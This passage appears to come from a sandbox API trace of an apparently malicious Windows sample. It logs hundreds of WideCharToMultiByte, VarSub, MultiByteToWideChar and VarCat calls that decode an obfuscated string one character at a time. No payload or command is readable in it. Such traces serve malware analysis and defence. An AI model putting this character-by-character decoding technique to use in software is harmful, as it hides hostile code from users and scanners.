cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f", lpUsedDefaultChar=0x0) returned 1 [0084.199] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0084.199] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0084.200] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.200] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0084.200] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v", lpUsedDefaultChar=0x0) returned 1 [0084.201] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0084.201] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0084.202] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0084.202] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0084.202] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0084.203] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i", lpUsedDefaultChar=0x0) returned 1 [0084.203] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0084.203] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="}", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="}", lpUsedDefaultChar=0x0) returned 1 [0084.204] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="p", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0084.204] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0084.205] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0084.205] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y", lpUsedDefaultChar=0x0) returned 1 [0084.206] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.206] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0084.206] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v", lpUsedDefaultChar=0x0) returned 1 [0084.206] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.206] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0084.207] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p", lpUsedDefaultChar=0x0) returned 1 [0084.207] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0084.207] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v", lpUsedDefaultChar=0x0) returned 1 [0084.208] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0084.208] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r", lpUsedDefaultChar=0x0) returned 1 [0084.209] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0084.210] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0084.210] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0084.210] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i", lpUsedDefaultChar=0x0) returned 1 [0084.211] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0084.211] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R", lpUsedDefaultChar=0x0) returned 1 [0084.211] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0084.212] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="…", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="…", lpUsedDefaultChar=0x0) returned 1 [0084.212] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="x", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0084.212] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="}", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="}", lpUsedDefaultChar=0x0) returned 1 [0084.213] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="p", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0084.213] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y", lpUsedDefaultChar=0x0) returned 1 [0084.214] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0084.214] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0084.215] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0084.215] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f", lpUsedDefaultChar=0x0) returned 1 [0084.215] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0084.216] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r", lpUsedDefaultChar=0x0) returned 1 [0084.216] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0084.216] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f", lpUsedDefaultChar=0x0) returned 1 [0084.217] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0084.217] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i", lpUsedDefaultChar=0x0) returned 1 [0084.218] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.218] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0084.218] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_", lpUsedDefaultChar=0x0) returned 1 [0084.218] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.218] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0084.219] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82", lpUsedDefaultChar=0x0) returned 1 [0084.219] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0084.219] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0084.220] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0084.220] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i", lpUsedDefaultChar=0x0) returned 1 [0084.221] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0084.221] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="/", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="/", lpUsedDefaultChar=0x0) returned 1 [0084.222] VarSub (in: pvarLeft=0x28f548, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\"", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="\"") returned 1 [0084.222] VarCat (in: pvarLeft=0x28f60c, pvarRight=0x28f458, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="9", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="9", lpUsedDefaultChar=0x0) returned 1 [0084.222] VarSub (in: pvarLeft=0x28f548, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=",", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr=",") returned 1 [0084.223] VarCat (in: pvarLeft=0x28f60c, pvarRight=0x28f458, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="/", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="/", lpUsedDefaultChar=0x0) returned 1 [0084.223] VarSub (in: pvarLeft=0x28f548, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\"", cbMultiByte=1, lpWideCharStr=0xe4a924, cchWideChar=1 | out: lpWideCharStr="\"") returned 1 [0084.223] VarCat (in: pvarLeft=0x28f60c, pvarRight=0x28f458, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d", lpUsedDefaultChar=0x0) returned 1 [0084.224] VarSub (in: pvarLeft=0x28f548, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0084.224] VarCat (in: pvarLeft=0x28f60c, pvarRight=0x28f458, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l", lpUsedDefaultChar=0x0) returned 1 [0084.225] VarSub (in: pvarLeft=0x28f548, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="_", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr="_") returned 1 [0084.225] VarCat (in: pvarLeft=0x28f60c, pvarRight=0x28f458, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e", lpUsedDefaultChar=0x0) returned 1 [0084.226] VarSub (in: pvarLeft=0x28f548, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="X", cbMultiByte=1, lpWideCharStr=0xe4a924, cchWideChar=1 | out: lpWideCharStr="X") returned 1 [0084.226] VarCat (in: pvarLeft=0x28f60c, pvarRight=0x28f458, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l", lpUsedDefaultChar=0x0) returned 1 [0084.226] VarSub (in: pvarLeft=0x28f548, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="_", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="_") returned 1 [0084.227] VarCat (in: pvarLeft=0x28f60c, pvarRight=0x28f458, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="P", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="P", lpUsedDefaultChar=0x0) returned 1 [0084.227] VarSub (in: pvarLeft=0x28f548, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0084.227] VarCat (in: pvarLeft=0x28f60c, pvarRight=0x28f458, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=";", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=";", lpUsedDefaultChar=0x0) returned 1 [0084.228] VarSub (in: pvarLeft=0x28f548, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.228] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=".", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0084.228] VarCat (in: pvarLeft=0x28f60c, pvarRight=0x28f458, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o", lpUsedDefaultChar=0x0) returned 1 [0084.229] VarSub (in: pvarLeft=0x28f548, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.229] MultiByteToWideChar 